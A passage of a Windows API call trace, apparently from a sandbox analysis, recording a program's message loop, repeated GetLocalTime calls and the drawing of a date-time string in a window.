wMilliseconds=0x21e)) [0109.801] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.813] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.813] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.813] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x22a)) [0109.813] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x22a)) [0109.813] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.834] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.834] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.834] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x23f)) [0109.834] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x23f)) [0109.834] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.845] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.845] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.845] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x24a)) [0109.845] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x24a)) [0109.845] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.877] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.877] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.877] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x26a)) [0109.878] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x26b)) [0109.878] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.887] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.887] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.887] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x274)) [0109.887] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x274)) [0109.887] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.903] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.903] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.903] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x284)) [0109.903] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x284)) [0109.904] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.920] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.920] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.920] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x295)) [0109.920] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x295)) [0109.921] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.941] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.941] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.941] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2aa)) [0109.941] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2aa)) [0109.941] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.949] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.949] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.949] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2b2)) [0109.949] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2b2)) [0109.949] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.969] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.969] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.969] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2c6)) [0109.969] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2c6)) [0109.969] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0109.979] TranslateMessage (lpMsg=0x2347a14) returned 0 [0109.979] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0109.979] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2d0)) [0109.979] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2d0)) [0109.979] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.001] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.001] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.001] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2e6)) [0110.001] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2e6)) [0110.001] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.010] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.010] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.010] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2ef)) [0110.010] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2ef)) [0110.011] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.026] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.026] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.026] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2ff)) [0110.026] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x2ff)) [0110.027] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.044] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.044] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.044] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x311)) [0110.044] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x311)) [0110.044] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.063] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.063] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.063] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x324)) [0110.063] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x324)) [0110.063] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.074] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.074] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.074] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x32f)) [0110.074] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x32f)) [0110.074] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.088] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.088] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.088] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x33d)) [0110.088] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x33d)) [0110.088] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.109] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.109] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.109] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x352)) [0110.109] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x352)) [0110.109] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.130] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.130] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.130] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x367)) [0110.130] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x367)) [0110.130] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.135] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.136] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.136] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x36d)) [0110.136] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x36d)) [0110.136] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.152] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.152] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.152] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x37d)) [0110.153] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x37e)) [0110.153] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.169] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.169] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.169] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x38e)) [0110.169] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x38e)) [0110.169] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.188] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.188] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.188] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3a1)) [0110.188] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3a1)) [0110.188] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.198] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.198] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.198] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3ab)) [0110.198] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3ab)) [0110.198] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.215] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.216] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.216] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3bd)) [0110.216] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3bd)) [0110.216] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.231] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.232] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.232] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3cd)) [0110.232] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3cd)) [0110.232] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.250] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.250] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.250] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3df)) [0110.250] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x27, wMilliseconds=0x3df)) [0110.250] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.266] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.266] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.266] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x7)) [0110.266] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x7)) [0110.266] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0110.266] GetDC (hWnd=0x0) returned 0xa0100d0 [0110.267] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0110.267] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0110.267] GetSysColor (nIndex=8) returned 0x0 [0110.267] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0110.267] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0110.267] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0110.267] UnrealizeObject (h=0x2d10099f) returned 1 [0110.267] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0110.267] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0110.267] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0110.267] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:40 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:40 PM", lprc=0x19f5bd) returned 13 [0110.268] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0110.268] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0110.268] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0110.268] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0110.268] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0110.268] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.277] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.277] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.277] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x12)) [0110.277] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x12)) [0110.277] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.298] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.298] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.298] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x27)) [0110.298] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x27)) [0110.298] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.308] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.308] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.308] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x31)) [0110.309] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x32)) [0110.309] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.330] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.330] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.331] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x49)) [0110.334] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x4b)) [0110.335] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.347] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.347] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.347] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x58)) [0110.348] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x59)) [0110.348] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.356] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.356] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.356] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, 